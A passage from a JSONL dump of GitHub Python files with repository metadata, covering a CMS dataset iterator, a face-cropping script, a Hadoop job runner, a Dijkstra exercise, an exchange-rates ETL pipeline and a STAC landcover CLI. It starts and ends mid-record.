incident)\n# count += 1\n","repo_name":"TanjidIslam/project-web-app","sub_path":"pagerduty-provision-app/adaptapp/modules/incident.py","file_name":"incident.py","file_ext":"py","file_size_in_byte":4907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41407123620","text":"from __future__ import division\n\nimport itertools\nimport re\n\nimport cached_property\n\nfrom .dbs import (\n get_dataset_record_from_dbs,\n get_file_records_from_dbs,\n)\nfrom .events import Events\n\n\n# Aliases for the urls of the global and regional XRootD redirector servers.\nXROOTD_REDIRECTORS = {\n 'global': 'cms-xrd-global.cern.ch',\n 'fnal': 'cmsxrootd.fnal.gov',\n 'infn': 'xrootd-cms.infn.it',\n}\n\n\nclass DatasetError(Exception):\n pass\n\n\nclass Dataset(object):\n \"\"\"The abstract Dataset class.\n\n Concrete subclasses are defined by overriding the following class attributes:\n\n name : string\n The fully qualified name of the dataset of the form\n \"/primary_dataset/processed_dataset/data_tier\".\n The wildcard character \"*\" is not permitted.\n dbs_instance : string\n One of the following DBS server instances where the dataset is\n registered:\n * global (default)\n * phys01\n * phys02\n * phys03\n * caf\n files : list of paths or urls, optional\n The paths or urls of the dataset's files.\n cross_section : numeric, optional\n The cross section in units of picobarns (pb). This attribute should\n only be overridden for datasets which are Monte Carlo samples.\n\n Iterating over a Dataset yields handles to the events contained in the files\n registered on DBS unless the :attr:`files` attribute is overridden.\n\n Parameters\n ----------\n selection : string, optional\n An initial selection applied to the dataset's events.\n chunk_size : numeric, optional\n The maximum chunk size in megabytes (MB) for iterating over the\n dataset's events. The chunk size is defined as the sum of the sizes\n of the dataset's files passed to the event handler. This is ignored\n when overriding the :attr:`files` attribute. The default is 2000 MB.\n valid : bool, optional\n Only iterate over files marked as valid on DBS. This is ignored when\n overriding the :attr:`files` attribute. The default is True.\n redirector : string, optional\n The url of the XRootD redirector server used to locate and access\n the dataset's files. The following regional redirector aliases are\n also recognized:\n * global (default)\n * fnal\n * infn\n This is ignored when overriding the :attr:`files` attribute.\n \"\"\"\n # The dataset name format regular expression.\n DATASET_NAME_FORMAT_RE = re.compile(r'^/\\S+/\\S+/\\S+$')\n\n # The fully qualified dataset name of the format\n # \"/primary_dataset/processed_dataset/data_tier\".\n name = None\n\n # The DBS server instance where the dataset is registered.\n # This defaults to \"global\".\n dbs_instance = 'global'\n\n # The user-defined paths or urls of the dataset's files.\n files = None\n\n # The cross section in units of picobarns (pb).\n # This is only applicable to Monte Carlo samples.\n cross_section = None\n\n def __init__(self, selection=None, chunk_size=2000, redirector=None, valid=True):\n self._validate_dataset_name()\n self.selection = selection\n self.chunk_size = chunk_size\n if redirector in XROOTD_REDIRECTORS:\n self.redirector = XROOTD_REDIRECTORS[redirector]\n else:\n self.redirector = redirector or XROOTD_REDIRECTORS['global']\n self.valid = valid\n\n def __eq__(self, other):\n return isinstance(other, Dataset) and self.name == other.name\n\n def __hash__(self):\n return hash(self.name)\n\n def __iter__(self):\n \"\"\"Yield handles to the dataset's events in chunks.\"\"\"\n if self.files is None:\n if self.redirector is None:\n raise DatasetError('A valid XRootD redirector url is required to access remote files.')\n else:\n file_url_template = 'root://{0}//{{0}}'.format(self.redirector)\n if self.valid:\n records = itertools.ifilter(lambda record: record.is_file_valid, self.dbs_file_records)\n else:\n records = iter(self.dbs_file_records)\n chunk, current_size = [], 0\n for record in records:\n file_url = file_url_template.format(record.logical_file_name)\n file_size_in_MB = record.file_size / 1000000\n if current_size + file_size_in_MB > self.chunk_size:\n yield Events(*chunk, selection=self.selection)\n chunk = [file_url]\n current_size = file_size_in_MB\n else:\n chunk.append(file_url)\n current_size += file_size_in_MB\n yield Events(*chunk, selection=self.selection)\n\n else:\n for f in self.files:\n yield f\n\n def _validate_dataset_name(self):\n if self.name is None or not self.DATASET_NAME_FORMAT_RE.match(self.name) or '*' in self.name:\n raise DatasetError(\n 'The class attribute \"name\" must reference a fully qualified '\n 'dataset name which does not contain wildcard characters.'\n )\n\n @property\n def datatype(self):\n \"\"\"The datatype is \"mc\" for Monte Carlo and \"data\" for data.\"\"\"\n return 'mc' if self.cross_section else 'data'\n\n @cached_property.cached_property\n def dbs_dataset_record(self):\n \"\"\"The dataset's information registered with DBS.\"\"\"\n return get_dataset_record_from_dbs(dataset=self.name, instance=self.dbs_instance)\n\n @cached_property.cached_property\n def dbs_file_records(self):\n \"\"\"The dataset's file information registered with DBS.\"\"\"\n return get_file_records_from_dbs(dataset=self.name, instance=self.dbs_instance)\n\n","repo_name":"swang373/vhbbtools","sub_path":"vhbbtools/core/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5781,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"38059531528","text":"#!/usr/bin/env python\nimport sys, math, Image\n\ndef Distance(p1,p2):\n dx = p2[0] - p1[0]\n dy = p2[1] - p1[1]\n return math.sqrt(dx*dx+dy*dy)\n\ndef ScaleRotateTranslate(image, angle, center = None, new_center = None, scale = None, resample=Image.BICUBIC):\n if (scale is None) and (center is None):\n return image.rotate(angle=angle, resample=resample)\n nx,ny = x,y = center\n sx=sy=1.0\n if new_center:\n (nx,ny) = new_center\n if scale:\n (sx,sy) = (scale, scale)\n cosine = math.cos(angle)\n sine = math.sin(angle)\n a = cosine/sx\n b = sine/sx\n c = x-nx*a-ny*b\n d = -sine/sy\n e = cosine/sy\n f = y-nx*d-ny*e\n return image.transform(image.size, Image.AFFINE, (a,b,c,d,e,f), resample=resample)\n\ndef CropFace(image, eye_left=(0,0), eye_right=(0,0), offset_pct=(0.2,0.2), dest_sz = (70,70)):\n # calculate offsets in original image\n offset_h = math.floor(float(offset_pct[0])*dest_sz[0])\n offset_v = math.floor(float(offset_pct[1])*dest_sz[1])\n # get the direction\n eye_direction = (eye_right[0] - eye_left[0], eye_right[1] - eye_left[1])\n # calc rotation angle in radians\n rotation = -math.atan2(float(eye_direction[1]),float(eye_direction[0]))\n # distance between them\n dist = Distance(eye_left, eye_right)\n # calculate the reference eye-width\n reference = dest_sz[0] - 2.0*offset_h\n # scale factor\n scale = float(dist)/float(reference)\n # rotate original around the left eye\n image = ScaleRotateTranslate(image, center=eye_left, angle=rotation)\n # crop the rotated image\n crop_xy = (eye_left[0] - scale*offset_h, eye_left[1] - scale*offset_v)\n crop_size = (dest_sz[0]*scale, dest_sz[1]*scale)\n image = image.crop((int(crop_xy[0]), int(crop_xy[1]), int(crop_xy[0]+crop_size[0]), int(crop_xy[1]+crop_size[1])))\n # resize it\n image = image.resize(dest_sz, Image.ANTIALIAS)\n return image\n\ndef readFileNames():\n try:\n inFile = open('path_to_created_csv_file.csv')\n except:\n raise IOError('There is no file named path_to_created_csv_file.csv in current directory.')\n return False\n\n picPath = []\n picIndex = []\n\n for line in inFile.readlines():\n if line != '':\n fields = line.rstrip().split(';')\n picPath.append(fields[0])\n picIndex.append(int(fields[1]))\n\n return (picPath, picIndex)\n\n\nif __name__ == \"__main__\":\n [images, indexes]=readFileNames()\nif not os.path.exists(\"modified\"):\n os.makedirs(\"modified\")\nfor img in images:\n image = Image.open(img)\n CropFace(image, eye_left=(252,364), eye_right=(420,366), offset_pct=(0.1,0.1), dest_sz=(200,200)).save(\"modified/\"+img.rstrip().split('/')[1]+\"_10_10_200_200.jpg\")\n CropFace(image, eye_left=(252,364), eye_right=(420,366), offset_pct=(0.2,0.2), dest_sz=(200,200)).save(\"modified/\"+img.rstrip().split('/')[1]+\"_20_20_200_200.jpg\")\n CropFace(image, eye_left=(252,364), eye_right=(420,366), offset_pct=(0.3,0.3), dest_sz=(200,200)).save(\"modified/\"+img.rstrip().split('/')[1]+\"_30_30_200_200.jpg\")\n CropFace(image, eye_left=(252,364), eye_right=(420,366), offset_pct=(0.2,0.2)).save(\"modified/\"+img.rstrip().split('/')[1]+\"_20_20_70_70.jpg\")","repo_name":"RoboticsClubIITK/PETcat_vision","sub_path":"Face_Recog/src/improcess.py","file_name":"improcess.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"39238068952","text":"from flask import Flask, render_template, session, request\nfrom flask_socketio import SocketIO, emit, join_room, leave_room, \\\n close_room, rooms, disconnect\n\n\napp = Flask(__name__)\nsocketio = SocketIO(app)\n\n@app.route('/')\ndef cam():\n return render_template(\"liveweb1.html\")\n\n@socketio.on('frame', namespace='/test')\ndef user_video(frame):\n\tfeed = frame\n\tprint (str(feed))\n\t\n\t\nif __name__ == '__main__':\n socketio.run(app)\n","repo_name":"MathsCoder/gUM","sub_path":"camapp.py","file_name":"camapp.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"138881292","text":"import os\n\n\n# funkcje mike index najlepiej sobie zwinac w pycharmie i przejsc na koniec skryptu\n\n\ndef sim11_index_unite(path):\n # puste listy i liczniki na pliki typu mike\n sim11_l = []\n res11_l = []\n sim11res_d = {}\n\n for root, dirs, files in os.walk(path):\n for file in files:\n if file.endswith(\".sim11\"):\n print(file)\n # dodanie sciezki pliku do listy\n element = str(os.path.join(root, file))\n element = element.replace(\"/\", \"\\\\\")\n sim11_l.append(element)\n # zaczytanie sciezki do pliku res11\n with open(element) as f:\n lines = f.readlines()\n index = lines.index(\" [Results]\\n\")\n sciezka = element.split(\"\\\\\")\n print(sciezka)\n try:\n hd_res = lines[index + 1].split(\"|\")[1]\n hd_res = hd_res.split(\"\\\\\")\n kropki = len(hd_res[0])\n sciezka = sciezka[:-kropki]\n hd_res = hd_res[1:]\n sciezka = sciezka + hd_res\n except:\n hd_res = lines[index + 1].split(\"'\")[1]\n sciezka = sciezka[:-1]\n print(sciezka)\n hd_res = [hd_res]\n print(hd_res)\n sciezka = sciezka + hd_res\n print(sciezka)\n\n # sciezka = sciezka + hd_res\n hd_res = \"\\\\\".join(sciezka)\n sim11res_d[element] = hd_res\n res11_l.append(hd_res)\n print(sim11res_d)\n\n print(sim11_l)\n return sim11_l, sim11res_d, res11_l\n\n\ndef file_index(path, rozsz):\n # puste listy i liczniki na pliki typu mike\n lista = []\n\n for root, dirs, files in os.walk(path):\n for file in files:\n if file.endswith(\".\" + rozsz):\n element = str(os.path.join(root, file))\n element = element.replace(\"/\", \"\\\\\")\n lista.append(element)\n\n return lista\n","repo_name":"michalgrzelak/mike11run","sub_path":"listowanie_sim11.py","file_name":"listowanie_sim11.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29879247023","text":"#!/usr/bin/python3\nfrom os import system, path\nfrom time import time\nfrom sys import argv\nfrom tempfile import mkdtemp\n\nif len(argv) == 2:\n a = b = c = d = int(argv[1])\nelse:\n a = int(argv[1]); b = int(argv[2])\n c = int(argv[3]); d = int(argv[4])\nif len(argv) >= 6:\n exe = argv[5]\nelse:\n exe = \"~/src/hadoop-1.1.2/bin/hadoop\"\nif len(argv) >= 7:\n n = int(argv[6])\nelse:\n n = 1\n\nhadoop_part = exe + \" jar Tiling.jar Tiling\"\n#hdfs = \"/scratch/local/\"\nhdfs = \"/scratch/local/\"\n\nrundir = mkdtemp(prefix='runs/',dir=\".\")\nwith open(path.join(rundir, \"foo\"),\"w\") as f:\n f.write(str(a) + \" \" + str(b) + \" \" + str(c) + \" \" + str(d))\n\nsystem(\"hadoop dfs -copyFromLocal \"+rundir+\" \"+hdfs+\"input\")\n\ntimes = []; cpu_time = [];\nmaps = []; reduces = []; \nread = []; written = []; \nmap_irecs = []; map_orecs = []\ncom_irecs = []; com_orecs = []\nred_irecs = []; red_orecs = []\nspills = [];\nsystem(hadoop_part + \" bootstrap \"+hdfs+\"input \"+hdfs+\"tmp0 \"+str(n))\n\nwith open(path.join(rundir,\"stats.dat\"), 'w') as f:\n f.write(\"%4s %9s %12s %16s %16s %5s %5s %10s %10s %10s %10s %10s %10s %10s \\n\" % (\"It\", \"Time\", \"CPU Time\", \"ReadIO\", \"WriteIO\", \"MTask\", \"RTask\", \"MapInRec\", \"MapOutRec\", \"ComInRec\", \"ComOutRec\", \"RedInRec\", \"RedOutRec\", \"Spills\") )\n\nfor i in range(a*b + a*c + b*c-2):\n start = time()\n system(hadoop_part + \" continue \"+hdfs+\"tmp\"+str(i)+\" \"+hdfs+\"tmp\"+str(i+1)+ \" \" + str(n) + \" &> \" + path.join(rundir,\"tmp.log\"))\n times.append(time()-start)\n with open(path.join(rundir,\"tmp.log\"),\"r\") as f:\n lines = f.readlines()\n for line in lines:\n parts = line.partition(\"=\")\n if \"Launched map tasks\" in parts[0]:\n maps.append(int(parts[2]))\n elif \"Launched reduce tasks\" in parts[0]:\n reduces.append(int(parts[2]))\n elif \"Bytes Written\" in parts[0]:\n written.append(int(parts[2]))\n elif \"Bytes Read\" in parts[0]:\n read.append(int(parts[2]))\n elif \"Map input records\" in parts[0]:\n map_irecs.append(int(parts[2]))\n elif \"Map output records\" in parts[0]:\n map_orecs.append(int(parts[2]))\n elif \"Combine input records\" in parts[0]:\n com_irecs.append(int(parts[2]))\n elif \"Combine output records\" in parts[0]:\n com_orecs.append(int(parts[2]))\n elif \"Reduce input records\" in parts[0]:\n red_irecs.append(int(parts[2]))\n elif \"Reduce output records\" in parts[0]:\n red_orecs.append(int(parts[2]))\n elif \"CPU time spent (ms)\" in parts[0]:\n cpu_time.append(int(parts[2]))\n elif \"Spilled Records\" in parts[0]:\n spills.append(int(parts[2]))\n system(\"cat \"+path.join(rundir,\"tmp.log\"))\n with open(path.join(rundir,\"stats.dat\"),\"a\") as f:\n f.write(\"%4d %9.2f %12.2f %16d %16d %5d %5d %10d %10d %10d %10d %10d %10d %10d \\n\" % (i+1, times[-1], cpu_time[-1]/1000., read[-1], written[-1], maps[-1], reduces[-1], map_irecs[-1], map_orecs[-1], com_irecs[-1], com_orecs[-1], red_irecs[-1], red_orecs[-1], spills[-1])) \n system(\"hadoop dfs -copyToLocal \"+hdfs+\"tmp\"+str(i+1)+\"/_logs \"+path.join(rundir,\"log\"+str(i)))\n system(\"cp \"+path.join(rundir,\"tmp.log\")+\" \"+path.join(rundir,\"log\"+str(i)+\"/log\"))\n\nsystem(hadoop_part + \" output \"+hdfs+\"tmp\"+str(a*b+a*c+b*c-2)+\" \"+hdfs+\"out \" + str(n))\nsystem(\"hadoop dfs -copyToLocal \"+hdfs+\"out \"+path.join(rundir,\"out\"))\nwith open(path.join(rundir,\"out/part-r-00000\"), \"r\") as f:\n lines = f.readlines() \n chunks = lines[0].rpartition(\"[\") \n toks = chunks[2].split(\", \")\n vals = []\n for i in range(len(toks)-1):\n vals.append(int(toks[i]))\n chunks = lines[1].rpartition(\"[\") \n toks = chunks[2].split(\", \")\n for i in range(len(toks)-1):\n vals[i] = vals[i] + int(toks[i])\n\nprint(*vals, sep=\", \", end=\"\\n\")\nfor i in range(len(times)):\n print(\"%5.2f, \" % (times[i]), end=\"\")\nprint(sum(times))\n\n\nsystem(\"hadoop dfs -copyToLocal \"+hdfs+\"out \"+path.join(rundir,\"out\"))\n\n","repo_name":"maxhutch/big-data-project","sub_path":"hadoop/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11648726931","text":"import sys\nsys.stdin = open('sample_input.txt')\n\n\ndef answer(graph):\n cost = [1001] * (N+1)\n visited = [0] * (N+1)\n # 0 -> N으로 가므로 맨처음 출발지 비용 0\n cost[0] = 0\n\n for _ in range(N+1):\n minidx = -1\n minV = 1001\n\n # 현재 트리 근접 노드에서 비용이 가장 작은 노드 찾기\n for i in range(N+1):\n if not visited[i] and cost[i] < minV:\n minV = cost[i]\n minidx = i\n visited[minidx] = 1\n # 이동시 최소 비용 최신화\n for idx, new_cost in enumerate(graph[minidx]):\n if new_cost:\n if not visited[idx] and new_cost + cost[minidx] < cost[idx]:\n cost[idx] = new_cost + cost[minidx]\n return cost[-1]\n\n\nT = int(input())\nfor t in range(1, T+1):\n N, E = map(int, input().split())\n graph =[[0] * (N+1) for _ in range(N+1)]\n for _ in range(E):\n s, e, w = map(int, input().split())\n graph[s][e] = w\n print('#{} {}'.format(t, answer(graph)))\n\n","repo_name":"ousia1022/SWEA-Algorithm","sub_path":"1014/5251_최소이동거리/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41502933351","text":"#here we have to use the multi processing module instead of threading module\nimport multiprocessing#importing the multiprocessing module\nimport time #importing the time module\nstart=time.perf_counter()#using the perf_conter function to evaluate time\ndef do_something(seconds):#seconds is the args to the do_something_function\n print(f\"Sleeping for {seconds} second(s)\")\n time.sleep(seconds)\n return f\"Done Sleeping for {seconds} time\"\n\n\nresults=[]#empty list object\nfor _ in range(10):#using the for loop with throw away variable\n p1=multiprocessing.Process(target=do_something,args=[1.5])\n p1.start()#staring the processed\n results.append(p1)\n\n#now using the join method so that the main thread will not be completed\nfor result in results:\n result.join()\n\nfinish=time.perf_counter()\nprint(f\"The time difference is {round(finish-start,2)}\")\n\n\n","repo_name":"psarangi550/PratikAllPythonRepo","sub_path":"Python_Multiprocessing_by_Corey_Schafer/creating_a _multiprocessing_program.py","file_name":"creating_a _multiprocessing_program.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"69926224569","text":"from etl_project.connectors.exchange_rates import ExchangeRatesClient\nfrom etl_project.connectors.postgresql import PostgresqlClient\nfrom etl_project.assets.pipeline_logging import PipelineLogging\nfrom etl_project.assets.metadata_logging import MetaDataLogging, MetaDataLoggingStatus\nfrom etl_project.assets.exchange_rates import extract_exchange_rates, transform_exchange_rates\nfrom etl_project.assets.postgresql import SqlTransform\nfrom jinja2 import Environment, FileSystemLoader\nfrom etl_project.assets.postgresql import SqlTransform\nfrom jinja2 import Environment, FileSystemLoader\nfrom dotenv import load_dotenv\nimport yaml\nfrom pathlib import Path\nimport os\nfrom datetime import datetime, timedelta, date\nfrom sqlalchemy import MetaData, Table, Column, Identity, String, Integer, DATE, DECIMAL\n\nif __name__ == \"__main__\":\n\n # load environment variables\n load_dotenv()\n\n # get config values from yaml file\n yaml_file_path = __file__.replace(\".py\", \".yaml\")\n if Path(yaml_file_path).exists:\n with open(yaml_file_path) as yaml_file:\n yaml_config = yaml.safe_load(yaml_file)\n else:\n raise Exception(f\"Missing {yaml_file_path} file!\")\n\n base_url = yaml_config.get(\"base_url\")\n base_currency = yaml_config.get(\"base_currency\")\n log_path = yaml_config.get(\"config\").get(\"log_folder_path\")\n\n # create logging client\n DB_USERNAME = os.environ.get(\"DB_USERNAME\")\n DB_PASSWORD = os.environ.get(\"DB_PASSWORD\")\n LOGGING_SERVER_NAME = os.environ.get(\"SERVER_NAME\")\n LOGGING_DATABASE_NAME = os.environ.get(\"DATABASE_NAME\")\n PORT = os.environ.get(\"PORT\")\n\n postgresql_logging_client = PostgresqlClient(\n db_server_name=LOGGING_SERVER_NAME,\n db_database=LOGGING_DATABASE_NAME,\n db_username=DB_USERNAME,\n db_password=DB_PASSWORD,\n db_port=PORT\n )\n\n metadata_logging = MetaDataLogging(pipeline_name=\"exchange_rates\", postgresql_client=postgresql_logging_client)\n pipeline_logger = PipelineLogging(pipeline_name=\"exchange_rates\", log_path=log_path)\n\n try:\n pipeline_logger.log_to_file(message=\"Starting pipeline run\")\n\n # set up environment variables\n pipeline_logger.log_to_file(message=\"Getting pipeline environment variables\")\n ACCESS_KEY = os.environ.get(\"ACCESS_KEY\")\n DB_USERNAME = os.environ.get(\"DB_USERNAME\")\n DB_PASSWORD = os.environ.get(\"DB_PASSWORD\")\n SERVER_NAME = os.environ.get(\"SERVER_NAME\")\n DATABASE_NAME = os.environ.get(\"DATABASE_NAME\")\n PORT = os.environ.get(\"PORT\")\n\n pipeline_logger.log_to_file(message=\"Initialising PostgresClient instance\")\n raw_psql_client = PostgresqlClient(\n db_server_name=SERVER_NAME,\n db_username=DB_USERNAME,\n db_password=DB_PASSWORD,\n db_port=PORT,\n db_database=DATABASE_NAME\n )\n\n meta = MetaData()\n rates_table_name = \"rates\"\n rates_table = Table(rates_table_name,\n meta,\n Column(\"id\", Integer, Identity(), primary_key=True),\n Column(\"currency\", String(3)),\n Column(\"rate\", DECIMAL(15, 6)),\n Column(\"base_currency\", String(3)),\n Column(\"date\", DATE)\n )\n\n pipeline_logger.log_to_file(message=f\"Creating table {rates_table_name} if it does not exist\")\n raw_psql_client.create_table_if_not_exists(meta=meta, table=rates_table)\n\n pipeline_logger.log_to_file(message=\"Creating ExchangeRatesClient instance\")\n exchange_rate_client = ExchangeRatesClient(api_base_url=base_url, api_access_key=ACCESS_KEY)\n\n pipeline_logger.log_to_file(message=\"Retrieving last extract date\")\n last_update = raw_psql_client.execute_scalar(query=\"SELECT MAX(date) AS last_updated FROM rates\")\n\n day_count = 0\n\n # if no last_update value retrieved from data, set the last_date to yesterday's date and days of data to extract to 1\n # else if last_update exists and is before the current date, set the days of date to extract to the number of days since last update\n if last_update is None:\n last_update = datetime.now().date() - timedelta(days=1)\n day_count = 1\n elif last_update < datetime.now().date():\n day_count = (datetime.now().date() - last_update).days\n\n # limit the number of days of data to extract to 10\n if day_count > 10:\n day_count = 10\n\n pipeline_logger.log_to_file(message=f\"Extracting rates data for the past {day_count} days\")\n\n for date_requested in (last_update + timedelta(days=n+1) for n in range(day_count)):\n\n pipeline_logger.log_to_file(message=f\"Extracting rates data for {date_requested}\")\n df_forex = extract_exchange_rates(exchange_rate_client=exchange_rate_client, base_currency=base_currency, date_requested=date_requested)\n\n if df_forex is not None:\n pipeline_logger.log_to_file(message=f\"Transforming rates DataFrame for {date_requested}\")\n df_forex_transformed = transform_exchange_rates(df=df_forex, base_currency=base_currency, date=date_requested)\n\n if df_forex_transformed is not None:\n pipeline_logger.log_to_file(message=f\"Loading data for {date_requested}\")\n records_affected = raw_psql_client.upsert(table=rates_table, data=df_forex_transformed.to_dict(orient=\"records\")).rowcount\n\n print(records_affected)\n\n # Transform and Load\n staging_postgresql_client = PostgresqlClient(\n db_server_name=os.getenv(\"TARGET_SERVER_NAME\"),\n db_database=os.getenv(\"TARGET_DATABASE_NAME\"),\n db_username=os.getenv(\"TARGET_DB_USERNAME\"),\n db_password=os.getenv(\"TARGET_DB_PASSWORD\"),\n db_port=os.getenv(\"TARGET_PORT\")\n )\n\n transform_environment = Environment(loader=FileSystemLoader(\"etl_project/sql/transform\"))\n\n pipeline_logger.log_to_file(message=\"Preparing transforming and loading\")\n for sql_path in transform_environment.list_templates():\n sql_template = transform_environment.get_template(sql_path)\n table_name = sql_template.make_module().config.get(\"table_name\")\n\n pipeline_logger.log_to_file(message=f\"START: Transforming and loading table {table_name}\")\n\n # Node\n sql_transform = SqlTransform(\n engine=staging_postgresql_client.engine,\n environment=transform_environment,\n table_name=table_name\n )\n\n sql_transform.create_table_as()\n\n pipeline_logger.log_to_file(message=f\"END: Transforming and loading table {table_name} successful\")\n\n ## create DAG\n #dag = TopologicalSorter()\n #dag.add()\n ## run transform\n #for node in tuple(dag.static_order()):\n # node.create_table_as()\n\n pipeline_logger.log_to_file(message=\"Pipeline run successful\")\n metadata_logging.log(status=MetaDataLoggingStatus.RUN_SUCCESS, logs=pipeline_logger.get_logs())\n\n except Exception as e:\n pipeline_logger.logger.error(f\"Pipeline failed with exception {e}\")\n metadata_logging.log(status=MetaDataLoggingStatus.RUN_FAILURE, logs=pipeline_logger.get_logs())\n","repo_name":"wacko-professional/project-1-team-5-dec","sub_path":"etl_project/pipelines/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":7337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73746865210","text":"import logging\nimport os\nfrom glob import glob\nfrom typing import Optional\n\nimport click\n\nfrom stactools.nrcan_landcover import cog, extent, stac, utils\nfrom stactools.nrcan_landcover.constants import JSONLD_HREF\n\nlogger = logging.getLogger(__name__)\n\n\ndef create_nrcanlandcover_command(cli: click.Group) -> click.Command:\n \"\"\"Creates the nrcanlandcover command line utility.\"\"\"\n @cli.group(\n \"nrcanlandcover\",\n short_help=(\n \"Commands for working with Natural Resources Canada Land Cover data\"\n ),\n )\n def nrcanlandcover() -> None:\n pass\n\n @nrcanlandcover.command(\n \"create-collection\",\n short_help=\"Creates a STAC collection from NRCan Landcover metadata\",\n )\n @click.option(\n \"-d\",\n \"--destination\",\n required=True,\n help=\"The output directory for the STAC Collection json\",\n )\n @click.option(\n \"-m\",\n \"--metadata\",\n help=\"The url to the metadata jsonld\",\n default=JSONLD_HREF,\n )\n def create_collection_command(destination: str, metadata: str) -> None:\n \"\"\"Creates a STAC Collection from NRCan Landcover metadata\n\n Args:\n destination (str): Directory used to store the collection json\n metadata (str): Path to a jsonld metadata file - provided by NRCan\n Returns:\n Callable\n \"\"\"\n create_collection_command_fn(destination, metadata)\n\n def create_collection_command_fn(destination: str, metadata: str) -> None:\n metadata_dict = utils.get_metadata(metadata)\n output_path = os.path.join(destination, \"collection.json\")\n collection = stac.create_collection(metadata_dict, metadata)\n collection.set_self_href(output_path)\n collection.normalize_hrefs(destination)\n collection.save()\n collection.validate()\n\n @nrcanlandcover.command(\n \"create-cog\",\n short_help=\"Transform Geotiff to Cloud-Optimized Geotiff.\",\n )\n @click.option(\n \"-d\",\n \"--destination\",\n required=True,\n help=\"The output directory for the COG\",\n )\n @click.option(\n \"-s\",\n \"--source\",\n required=False,\n help=\"Path to an input GeoTiff\",\n )\n @click.option(\n \"-t\",\n \"--tile\",\n help=\"Tile the tiff into many smaller files.\",\n is_flag=True,\n default=False,\n )\n def create_cog_command(destination: str, source: Optional[str],\n tile: bool) -> None:\n \"\"\"Generate a COG from a GeoTiff. The COG will be saved in the desination\n with `_cog.tif` appended to the name.\n\n Args:\n destination (str): Local directory to save output COGs\n source (str, optional): An input NRCAN Landcover GeoTiff\n tile (bool, optional): Tile the tiff into many smaller files\n \"\"\"\n create_cog_command_fn(destination, source, tile)\n\n def create_cog_command_fn(destination: str, source: Optional[str],\n tile: bool) -> None:\n if not os.path.isdir(destination):\n raise IOError(f'Destination folder \"{destination}\" not found')\n\n if source is None:\n cog.download_create_cog(destination, retile=tile)\n elif tile:\n cog.create_retiled_cogs(source, destination)\n else:\n output_path = os.path.join(\n destination,\n os.path.basename(source)[:-4] + \"_cog.tif\")\n cog.create_cog(source, output_path)\n\n @nrcanlandcover.command(\n \"create-item\",\n short_help=\"Create a STAC item using JSONLD metadata and a COG\",\n )\n @click.option(\n \"-d\",\n \"--destination\",\n required=True,\n help=\"The output directory for the STAC json\",\n )\n @click.option(\n \"-c\",\n \"--cog\",\n required=True,\n help=\"COG href\",\n )\n @click.option(\n \"-e\",\n \"--extent-asset\",\n required=False,\n help=\"An asset representing the extent of the STAC Item\",\n )\n @click.option(\n \"-m\",\n \"--metadata\",\n help=\"The url to the metadata description.\",\n default=JSONLD_HREF,\n )\n def create_item_command(destination: str, cog: str,\n extent_asset: Optional[str],\n metadata: str) -> None:\n \"\"\"Generate a STAC item using the metadata, with an asset url as provided.\n\n Args:\n destination (str): Local directory to save the STAC Item json\n cog (str): location of a COG asset for the item\n extent_asset (str, optional): File containing a GeoJSON asset of the extent\n metadata (str): url containing the NRCAN Landcover JSONLD metadata\n \"\"\"\n create_item_command_fn(destination, cog, extent_asset, metadata)\n\n def create_item_command_fn(destination: str, cog: str,\n extent_asset: Optional[str],\n metadata: str) -> None:\n jsonld_metadata = utils.get_metadata(metadata)\n output_path = os.path.join(destination,\n os.path.basename(cog)[:-4] + \".json\")\n if extent_asset is None and os.path.exists(\n os.path.join(destination, \"extent.geojson\")):\n extent_asset = os.path.join(destination, \"extent.geojson\")\n item = stac.create_item(jsonld_metadata,\n destination,\n metadata,\n cog,\n extent_asset_href=extent_asset)\n item.set_self_href(output_path)\n item.make_asset_hrefs_relative()\n item.save_object()\n item.validate()\n\n @nrcanlandcover.command(\n \"create-extent-asset\",\n short_help=\"Create extent asset for the STAC Item\",\n )\n @click.option(\n \"-d\",\n \"--destination\",\n required=True,\n help=\"The output directory for the extent asset\",\n )\n @click.option(\n \"-m\",\n \"--metadata\",\n help=\"The url to the metadata description.\",\n default=JSONLD_HREF,\n )\n @click.option(\n \"-c\",\n \"--cog\",\n required=False,\n help=\"COG href\",\n )\n def create_extent_asset_command(destination: str, metadata: str,\n cog: Optional[str]) -> None:\n \"\"\"Generate a GeoJSON of the extent of the STAC Item.\n\n Args:\n destination (str): Local directory to save output COGs\n metadata (str): URL to the metadata\n \"\"\"\n create_extent_asset_command_fn(destination, metadata, cog)\n\n def create_extent_asset_command_fn(destination: str, metadata: str,\n cog: Optional[str]) -> None:\n if not os.path.isdir(destination):\n raise IOError(f'Destination folder \"{destination}\" not found')\n\n jsonld_metadata = utils.get_metadata(metadata)\n if cog is not None:\n file_name = os.path.basename(cog).replace(\".tif\",\n \"_extent.geojson\")\n else:\n file_name = \"extent.geojson\"\n output_path = os.path.join(destination, file_name)\n extent.create_extent_asset(jsonld_metadata, output_path, cog)\n\n @nrcanlandcover.command(\n \"build-full-collection\",\n short_help=\"Creates a STAC collection with Items and Assets\",\n )\n @click.option(\n \"-d\",\n \"--destination\",\n required=True,\n help=\"The output directory for the STAC Collection json\",\n )\n @click.option(\n \"-s\",\n \"--source\",\n required=False,\n help=\"Path to an input GeoTiff\",\n default=None,\n )\n @click.option(\n \"-m\",\n \"--metadata\",\n help=\"The 